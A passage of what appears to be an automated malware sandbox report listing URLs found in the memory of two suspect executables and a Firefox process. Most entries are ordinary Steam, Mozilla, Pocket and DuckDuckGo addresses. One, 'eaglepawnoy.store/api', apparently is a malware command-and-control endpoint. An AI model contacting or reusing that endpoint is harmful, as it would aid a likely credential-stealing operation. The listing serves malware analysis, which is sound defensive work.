0000001C.00000003.3122878737.000000000101C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw&
Source: file.exe, 00000000.00000003.2142341622.0000000000AF2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142519929.0000000000AF2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2134275878.0000000000AE1000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3032649215.0000000001699000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3032704846.000000000164B000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3166224749.000000000164B000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3122878737.000000000101C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&amp
Source: 26e226f915.exe, 0000000D.00000003.3166224749.000000000164B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/scriptacul
Source: file.exe, 00000000.00000003.2142341622.0000000000AF2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142519929.0000000000AF2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2134275878.0000000000AE1000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901061676.00000000011D3000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901061676.00000000011C7000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901157759.00000000011D3000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901061676.00000000011C0000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3032649215.0000000001699000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3032704846.000000000164B000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3219630830.0000000000FD1000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3173301010.0000000000FD1000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3122878737.000000000101C000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3178327332.0000000000FD1000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3198150791.0000000000FD1000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3266928045.0000000000FD1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpE
Source: file.exe, 00000000.00000003.2142341622.0000000000AF2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142519929.0000000000AF2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2134275878.0000000000AE1000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3032649215.0000000001699000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3032704846.000000000164B000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3166224749.000000000164B000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3122878737.000000000101C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/webui/clientcom.js?v=qYlgdgWOD4Ng&amp
Source: 26e226f915.exe, 0000000D.00000003.3166224749.000000000164B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shH
Source: 26e226f915.exe, 0000000D.00000003.3166224749.000000000164B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared
Source: file.exe, 00000000.00000003.2142341622.0000000000AF2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142519929.0000000000AF2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2134275878.0000000000AE1000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901061676.00000000011D3000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901061676.00000000011C7000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901157759.00000000011D3000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901061676.00000000011C0000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3032649215.0000000001699000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3122878737.000000000101C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/buttons.css?v=tuNiaSwXwcYT&l=engl
Source: 26e226f915.exe, 0000000D.00000003.3032649215.0000000001699000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3122878737.000000000101C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/motiva_sans.css?v=GfSjbGKcNYaQ&l=
Source: file.exe, 00000000.00000003.2134275878.0000000000AE1000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901061676.00000000011D3000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901061676.00000000011C7000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901157759.00000000011D3000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901061676.00000000011C0000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3032649215.0000000001699000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3122878737.000000000101C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/shared_global.css?v=Ff_1prscqzeu&
Source: file.exe, 00000000.00000003.2142341622.0000000000AF2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142519929.0000000000AF2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2134275878.0000000000AE1000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901061676.00000000011D3000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901061676.00000000011C7000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901157759.00000000011D3000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901061676.00000000011C0000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3032649215.0000000001699000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3032704846.000000000164B000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3219630830.0000000000FD1000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3173301010.0000000000FD1000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3122878737.000000000101C000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3178327332.0000000000FD1000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3198150791.0000000000FD1000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3266928045.0000000000FD1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/shared_responsive.css?v=eghn9DNyCY67&
Source: file.exe, 00000000.00000003.2142341622.0000000000AF2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142519929.0000000000AF2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2134275878.0000000000AE1000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901061676.00000000011D3000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901061676.00000000011C7000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901157759.00000000011D3000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3032649215.0000000001699000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3122878737.000000000101C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
Source: file.exe, 00000000.00000003.2142341622.0000000000AF2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142519929.0000000000AF2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2134275878.0000000000AE1000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901061676.00000000011D3000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901061676.00000000011C7000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901157759.00000000011D3000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3032649215.0000000001699000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3122878737.000000000101C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_logo.png
Source: file.exe, 00000000.00000003.2142341622.0000000000AF2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142519929.0000000000AF2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2134275878.0000000000AE1000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901061676.00000000011D3000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901061676.00000000011C7000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901157759.00000000011D3000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3032649215.0000000001699000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3122878737.000000000101C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.p
Source: file.exe, 00000000.00000003.2142341622.0000000000AF2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142519929.0000000000AF2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2134275878.0000000000AE1000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901061676.00000000011D3000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901061676.00000000011C7000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901157759.00000000011D3000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3032649215.0000000001699000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3122878737.000000000101C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
Source: 26e226f915.exe, 0000000D.00000003.3166224749.000000000164B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/auth_reX
Source: file.exe, 00000000.00000003.2142341622.0000000000AF2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142519929.0000000000AF2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2134275878.0000000000AE1000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901061676.00000000011D3000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901061676.00000000011C7000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901157759.00000000011D3000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901061676.00000000011C0000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3032649215.0000000001699000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3032704846.000000000164B000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3219630830.0000000000FD1000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3173301010.0000000000FD1000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3122878737.000000000101C000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3178327332.0000000000FD1000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3198150791.0000000000FD1000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3266928045.0000000000FD1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/auth_refresh.js?v=WgUxSlKTb3W1
Source: 26e226f915.exe, 0000000D.00000003.3166224749.000000000164B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_
Source: file.exe, 00000000.00000003.2142341622.0000000000AF2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142519929.0000000000AF2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2134275878.0000000000AE1000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901061676.00000000011D3000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901061676.00000000011C7000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901157759.00000000011D3000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901061676.00000000011C0000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3032649215.0000000001699000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3032704846.000000000164B000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3219630830.0000000000FD1000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3173301010.0000000000FD1000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3122878737.000000000101C000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3178327332.0000000000FD1000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3198150791.0000000000FD1000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3266928045.0000000000FD1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_global.js?v=wJD9maDpDcV
Source: file.exe, 00000000.00000003.2142341622.0000000000AF2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142519929.0000000000AF2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2134275878.0000000000AE1000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901061676.00000000011D3000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901061676.00000000011C7000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901157759.00000000011D3000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901061676.00000000011C0000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3032649215.0000000001699000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3122878737.000000000101C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v
Source: file.exe, 00000000.00000003.2142341622.0000000000AF2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142519929.0000000000AF2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2134275878.0000000000AE1000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901061676.00000000011D3000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901061676.00000000011C7000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901157759.00000000011D3000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901061676.00000000011C0000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3032649215.0000000001699000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3032704846.000000000164B000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3219630830.0000000000FD1000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3173301010.0000000000FD1000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3122878737.000000000101C000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3178327332.0000000000FD1000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3198150791.0000000000FD1000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3266928045.0000000000FD1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0&amp
Source: 26e226f915.exe, 0000000D.00000003.3166224749.000000000164B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflarex
Source: firefox.exe, 0000001B.00000002.3303238080.00000170842E5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3298702178.0000017083B46000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://content-signature-2.cdn.mozilla.net
Source: file.exe, 00000000.00000003.2183850637.000000000573A000.00000004.00000800.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3109202383.0000000005E22000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3281310236.000001708318D000.00000004.00000800.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3217655123.0000000005972000.00000004.00000800.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3219276546.0000000005972000.00000004.00000800.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3219501177.0000000005975000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg
Source: file.exe, 00000000.00000003.2183850637.000000000573A000.00000004.00000800.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3109202383.0000000005E22000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3281310236.000001708318D000.00000004.00000800.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3217655123.0000000005972000.00000004.00000800.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3219276546.0000000005972000.00000004.00000800.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3219501177.0000000005975000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: firefox.exe, 0000001B.00000003.3129585316.000001708BE1B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile.services.mozilla.com
Source: firefox.exe, 0000001B.00000003.3129585316.000001708BE1B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3310993207.0000017084B16000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3300643832.0000017083EE3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3280899223.0000017081FC0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000003.3129585316.000001708BE81000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3133141618.000001708BDCD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3133141618.000001708BDF5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.3255924567.000001E2F2600000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://contile.services.mozilla.com/v1/tiles
Source: firefox.exe, 0000001B.00000003.3221206285.000001708BF77000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://crbug.com/993268
Source: firefox.exe, 0000001B.00000003.3221206285.000001708BF77000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/API/ElementCSSInlineStyle/style#setting_styles)
Source: firefox.exe, 0000001B.00000003.3221206285.000001708BF77000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Statements/for-await...of
Source: firefox.exe, 0000001B.00000003.3221206285.000001708BF77000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/Web_Components/Using_custom_elements#using_the_lifecycl
Source: firefox.exe, 0000001B.00000003.3101001598.0000017080DE2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3275969603.0000017080DF4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3088112226.000001708360F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3082674705.0000017083400000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3277613041.0000017081144000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3089312930.0000017083631000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3090212714.0000017083652000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3296245182.0000017083800000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/
Source: file.exe, 00000000.00000003.2156705356.000000000577A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2156839370.000000000577A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2156632127.000000000577C000.00000004.00000800.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3048821838.0000000005E2B000.00000004.00000800.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3049132775.0000000005E2B000.00000004.00000800.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3048636606.0000000005E2D000.00000004.00000800.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3153468407.00000000059AB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: file.exe, 00000000.00000003.2156705356.000000000577A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2156839370.000000000577A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2156632127.000000000577C000.00000004.00000800.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3048821838.0000000005E2B000.00000004.00000800.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3049132775.0000000005E2B000.00000004.00000800.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3048636606.0000000005E2D000.00000004.00000800.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3153468407.00000000059AB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: file.exe, 00000000.00000003.2156705356.000000000577A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2156839370.000000000577A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2156632127.000000000577C000.00000004.00000800.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3048821838.0000000005E2B000.00000004.00000800.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3049132775.0000000005E2B000.00000004.00000800.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3048636606.0000000005E2D000.00000004.00000800.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3153468407.00000000059AB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B16000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3141316224.000001708C1C6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3296245182.0000017083800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000003.3115631596.000001708C1C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/y
Source: file.exe, 00000000.00000003.2134302834.0000000000A6E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142391592.0000000000A6E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://eaglepawnoy.store:443/api
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B16000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3281310236.000001708318D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox-api-proxy.cdn.mozilla.net/
Source: firefox.exe, 0000001B.00000003.3143518089.0000017085579000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3310993207.0000017084B16000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3145541986.0000017085580000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/ms-images/673d2808-e5d8-41b9-957
Source: firefox.exe, 0000001B.00000003.3143518089.0000017085579000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3310993207.0000017084B16000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3145541986.0000017085580000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/ms-images/706c7a85-cf23-442e-8a9
Source: firefox.exe, 0000001B.00000002.3281202176.00000170830F0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.3328273548.0000017085378000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3140375885.00000170853EF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox-source-docs.mozilla.org/performance/scroll-linked_effects.html
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B16000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3281310236.000001708318D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B16000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3281310236.000001708318D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/career?utm_source=pocket-newtab
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B16000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3281310236.000001708318D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/entertainment?utm_source=pocket-newtab
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B16000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/entertainment?utm_source=pocket-newtabTesting
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B16000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3281310236.000001708318D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/food?utm_source=pocket-newtab
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B16000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3281310236.000001708318D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/health?utm_source=pocket-newtab
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B16000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3281310236.000001708318D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/science?utm_source=pocket-newtab
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B16000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3281310236.000001708318D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/self-improvement?utm_source=pocket-newtab
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B16000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/self-improvement?utm_source=pocket-newtabchrome://activity-stream/cont
